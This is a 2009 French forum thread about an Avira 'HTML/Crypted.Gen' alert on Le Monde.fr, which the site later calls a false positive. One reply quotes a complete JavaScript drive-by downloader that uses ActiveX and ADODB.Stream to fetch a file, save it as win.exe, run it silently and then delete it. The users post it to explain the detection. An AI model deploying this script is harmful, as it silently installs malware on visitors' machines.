Alerte Crypted.Gen avec Antivir
Fermé
grobiton
-
21 mai 2009 à 13:59
diegodlv Messages postés 6 Date d'inscription jeudi 21 mai 2009 Statut Membre Dernière intervention 25 mai 2009 - 25 mai 2009 à 16:14
diegodlv Messages postés 6 Date d'inscription jeudi 21 mai 2009 Statut Membre Dernière intervention 25 mai 2009 - 25 mai 2009 à 16:14
A voir également:
- Alerte Crypted.Gen avec Antivir
- Fausse alerte mcafee - Accueil - Piratage
- Fausse alerte connexion facebook - Guide
- Fausse alerte virus google - Guide
- Message alerte virus google chrome - Accueil - Virus
- Alerte lors accès presse-papier - Guide
9 réponses
diegodlv
Messages postés
6
Date d'inscription
jeudi 21 mai 2009
Statut
Membre
Dernière intervention
25 mai 2009
21 mai 2009 à 15:58
21 mai 2009 à 15:58
Salut,
J'ai exactement le même problème et ce depuis ce matin.
De plus j'ai la chance d'avoir une copine qui comme (mauvais) réflexe a ignoré l'alerte et du coup autorisé l'accès.
Tout d'abord j'ai une série de question a te soumettre pour relier un peu les caractéristiques de l'alerte.
Je pense que ce n'est pas un faux positif, car sinon l'antivirus le détecterait a chaque fois. je m'explique.
Pour ma part l'alerte apparait dans un cas précis : en utilisant IE.
J'ai essayé avec FireFox et je n'ai aucun problème.
j'ai essayer plusieurs désinfection de base (juste antivirus et malware) mais après avoir viré probablement le virus qu'elle avais laisser entrer je continue d'avoir les alerte dans le cas de figure présenté plus haut.
Fait moi savoir les condition de ton alerte.
Une autre possibilité me viens en tête, dans le sens de la fausse alerte, comme IE ne suit pas les standards, Une page web nécessite d'écrire du code compatible pour IE. le problème pourrai se retrouver la.
Ça impliquerai une mise a jour pendant la nuit du site du monde.
Je doute.
[EDIT]: j'ai pris contact avec Le Monde.fr et je suis en attente d'une réponse de leur part.
J'ai exactement le même problème et ce depuis ce matin.
De plus j'ai la chance d'avoir une copine qui comme (mauvais) réflexe a ignoré l'alerte et du coup autorisé l'accès.
Tout d'abord j'ai une série de question a te soumettre pour relier un peu les caractéristiques de l'alerte.
Je pense que ce n'est pas un faux positif, car sinon l'antivirus le détecterait a chaque fois. je m'explique.
Pour ma part l'alerte apparait dans un cas précis : en utilisant IE.
J'ai essayé avec FireFox et je n'ai aucun problème.
j'ai essayer plusieurs désinfection de base (juste antivirus et malware) mais après avoir viré probablement le virus qu'elle avais laisser entrer je continue d'avoir les alerte dans le cas de figure présenté plus haut.
Fait moi savoir les condition de ton alerte.
Une autre possibilité me viens en tête, dans le sens de la fausse alerte, comme IE ne suit pas les standards, Une page web nécessite d'écrire du code compatible pour IE. le problème pourrai se retrouver la.
Ça impliquerai une mise a jour pendant la nuit du site du monde.
Je doute.
[EDIT]: j'ai pris contact avec Le Monde.fr et je suis en attente d'une réponse de leur part.
Le texte du message du d'erreur "contient le modèle de détection de virus HTML Crypted.Gen" me laisse penser qu'il s'agit d'après Avira non d'un virus mais d'un truc pour détecter les virus HTML. Donc ça serait inoffensif ? A vérifier auprès d'Avira, mais je ne sais pas comment les contacter.
Par ailleurs, quel genre de virus un fichier HTML peut-il contenir ?
Par ailleurs, quel genre de virus un fichier HTML peut-il contenir ?
diegodlv
Messages postés
6
Date d'inscription
jeudi 21 mai 2009
Statut
Membre
Dernière intervention
25 mai 2009
21 mai 2009 à 19:07
21 mai 2009 à 19:07
Des script .js par exemple. mais en theorie ceux ci ne peuvent enregistrer ni acceder au disque dur.
Hors j'ai lu que ce virus permet d'ecrire dans un fichier.
En fait un modele de detection est un moyen de trouver le virus.
Le programme de recherche fait appel au expression reguliere pour trouver des modeles correspondant au virus en question.
Ce qui me gene c'est que ça apparaissent aujourd'hui, et que hier avec IE il n'y avais aucun probleme.
Moi avec FF je n'ai pas le souci mais ma copine elle m'as confirmé que ça n'est apparue seulement que depuis aujourd'hui.
Or pas de MAJ de Antivir sur cette pattern de virus.
Donc soit mise a jour du site, soit piratage du site.
A voir si apres la mise a jour de ce soir de avira le probleme persiste.
Hors j'ai lu que ce virus permet d'ecrire dans un fichier.
En fait un modele de detection est un moyen de trouver le virus.
Le programme de recherche fait appel au expression reguliere pour trouver des modeles correspondant au virus en question.
Ce qui me gene c'est que ça apparaissent aujourd'hui, et que hier avec IE il n'y avais aucun probleme.
Moi avec FF je n'ai pas le souci mais ma copine elle m'as confirmé que ça n'est apparue seulement que depuis aujourd'hui.
Or pas de MAJ de Antivir sur cette pattern de virus.
Donc soit mise a jour du site, soit piratage du site.
A voir si apres la mise a jour de ce soir de avira le probleme persiste.
grobiton
Messages postés
2
Date d'inscription
jeudi 21 mai 2009
Statut
Membre
Dernière intervention
21 mai 2009
21 mai 2009 à 19:15
21 mai 2009 à 19:15
J'ai fait la mise à jour d'Antivir ce matin, c'est donc avec la dernière base de virus qu'il y a cette alerte.
Quelqu'un sait-il ce que fait Crypted.Gen ?
diegodlv
Messages postés
6
Date d'inscription
jeudi 21 mai 2009
Statut
Membre
Dernière intervention
25 mai 2009
21 mai 2009 à 19:45
21 mai 2009 à 19:45
Le script en question permettant de sauvegarder sous IE le fichier exe malware
en gros il sauvegarde un fichier du nom de win.exe qu'il execute ensuite
Source: https://www.developpez.net/forums/d578227/systemes/windows/securite/vista-malware-html-crypted-gen-virus-detecte/
Je repete que selon les rapport de mise a jour de antivir les pattern de reconnaissance de ce vitus n'ont pas été modifié depuis 1 mois !!
<script>
var ailian,zhan,cmdss;
ailian="ici le path vers l'exe";
zhan="win.exe";
cmdss="cmd.exe";
try{var ado=(document.createElement("object"));
var d=1;
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var e=1;
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
var f=1;
var ln="Ado";
var lzn="db.St";
var an="ream";
var g=1;
var as=ado.createobject(ln+lzn+an,"");
var h=1;
xml.Open("GET",ailian,0);
xml.Send();
as.type=1
var n=1;
as.open();
as.write(xml.responseBody);
as.savetofile(zhan,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute(zhan,"","","open",0);
shell.ShellExecute(cmdss," /c del /S /Q /F "+zhan,"","open",0);}
catch(e){};</script>
en gros il sauvegarde un fichier du nom de win.exe qu'il execute ensuite
Source: https://www.developpez.net/forums/d578227/systemes/windows/securite/vista-malware-html-crypted-gen-virus-detecte/
Je repete que selon les rapport de mise a jour de antivir les pattern de reconnaissance de ce vitus n'ont pas été modifié depuis 1 mois !!
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
J'ai effacé le cache d'Internet Explorer et AntiVir ne trouve plus rien.
J'ai aussi cherché si un fichier win.exe a été créé : niet.
Bien que j'ai autorisé l'accès à la page, aucun problème particulier détecté.
J'abandonne.
J'ai aussi cherché si un fichier win.exe a été créé : niet.
Bien que j'ai autorisé l'accès à la page, aucun problème particulier détecté.
J'abandonne.
diegodlv
Messages postés
6
Date d'inscription
jeudi 21 mai 2009
Statut
Membre
Dernière intervention
25 mai 2009
21 mai 2009 à 20:55
21 mai 2009 à 20:55
Moi pendant le scan il m'a trouvé ceci:
The file 'C:\Users\diegodlv\AppData\Local\Temp\plugtmp-1\plugin-data'
contained a virus or unwanted program 'EXP/Pidief.SD' [exploit]
Action(s) taken:
The file was moved to '4a8a42fb.qua'!
Donc p-e il y etait avant mais ça m'ettonerai.
Le script fait une requete a un serveur et ecrit le resultat dans un fichier qu'il execute.
Le code affiché n'est pas forcement celui qui traine sur Le Monde.fr mais plutot la methode utilisé.
En gros, ce script est une faille permettant d'executer du code, n'importe lequel.
Si vous n'etes pas infecté tant mieu.
Moi j'ai refait un scan et aucune detection.
Pour ne plus etre embeté par ces alertes je vous conseille d'utiliser Firefox (ou Opera).
The file 'C:\Users\diegodlv\AppData\Local\Temp\plugtmp-1\plugin-data'
contained a virus or unwanted program 'EXP/Pidief.SD' [exploit]
Action(s) taken:
The file was moved to '4a8a42fb.qua'!
Donc p-e il y etait avant mais ça m'ettonerai.
Le script fait une requete a un serveur et ecrit le resultat dans un fichier qu'il execute.
Le code affiché n'est pas forcement celui qui traine sur Le Monde.fr mais plutot la methode utilisé.
En gros, ce script est une faille permettant d'executer du code, n'importe lequel.
Si vous n'etes pas infecté tant mieu.
Moi j'ai refait un scan et aucune detection.
Pour ne plus etre embeté par ces alertes je vous conseille d'utiliser Firefox (ou Opera).
Que faire ?
Pour l'instant je dis simplement à l'antivirus d'effacer le fichier défectueux, celà n'empêche pas de consulter le site du Monde en attendant que le Monde corrige son site.
Pour l'instant je dis simplement à l'antivirus d'effacer le fichier défectueux, celà n'empêche pas de consulter le site du Monde en attendant que le Monde corrige son site.
diegodlv
Messages postés
6
Date d'inscription
jeudi 21 mai 2009
Statut
Membre
Dernière intervention
25 mai 2009
25 mai 2009 à 16:14
25 mai 2009 à 16:14
J'ai reçu la reponse de "Le Monde.fr" :
"Bonjour,
ne vous inquiétez pas notre site est sur. Il s'agissait d'un marquage des pages du site effectué durant deux jours par notre service informatique et qui à malencontreusement été associé à un virus par Avira.
Nous vous remercions pour nous avoir prévenu aussi rapidement.
Nous vous remercions de l'intérêt que vous portez à nos services.
Cordialement.
Le service client du Monde.fr"
Il n'y a pas de souci donc, c'etait bien un faux positif cette fois-ci.
"Bonjour,
ne vous inquiétez pas notre site est sur. Il s'agissait d'un marquage des pages du site effectué durant deux jours par notre service informatique et qui à malencontreusement été associé à un virus par Avira.
Nous vous remercions pour nous avoir prévenu aussi rapidement.
Nous vous remercions de l'intérêt que vous portez à nos services.
Cordialement.
Le service client du Monde.fr"
Il n'y a pas de souci donc, c'etait bien un faux positif cette fois-ci.
21 mai 2009 à 17:56
Config XP SP3 + IE 8.
J'ai tourné Norton, Comodo internet security, spyware terminator et rien trouvé.
Je pense que c'est bien un faux positif.
Je n'arrive pas à reporter le pb à AVIRA
a+
21 mai 2009 à 18:02
J'utilise firefox et antivir.
Je n'ose pas essayer d'accéder par IE et je n'ose pas essayer d'un autre ordinateur.
Comme je ne suis pas le seul, il est vraisemblable que le site du Monde soit infecté.
21 mai 2009 à 18:26
c'est curieux que le probleme arrive donc avec firefox.
jusqu'a present les alerte avait été donné via IE.
J'ai essayé avec un autre ordinateur, le probleme est le meme et encore avec IE.
firefox (derniere version) ne semble pas broncher on dirai.
Pouvez vous verifier qu'il s'agit de FF ?
Infection ou pas ?
Pour le moment on peu pas dire, j'attend la reponse des gens du monde.
voici le message de antivir sur la detection:
Virus or unwanted program 'HTML/Crypted.Gen [virus]'
detected in file 'C:\Users\diegodlv\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\KLJQR14C\14-des-anciens-detenus-de-guantanamo-auraient-repris-les-armes_1196227_3222[1].htm.
Action performed: Delete file
Le fait qu'il apparraisse aujourd'hui sur le site du monde nous amene a 3 pistes.
-Mise a jour du site du monde avec un code tres tres proche d'un code viral (peu probable)
-Mise a jour de a definition de virus de Antivir qui crois le voir (mais pourquoi uniquement sur Le Monde.fr)
-Le Monde.fr a été piraté.
[EDIT]: La derniere fois que le moteur de recherche de avira a été actualisé sur la recherche de ce virus dat d'un mois. donc on peut ecarté la these de la recherche.
[EDIT2]: Le Monde.fr ne va semble t'il pas repondre a mon courrier, car dans le cas d'un piratage il n'est pas dans son interet que tout le monde le sache. Imaginer que les gens fui le site, fesant chuter les revenu publicitaire...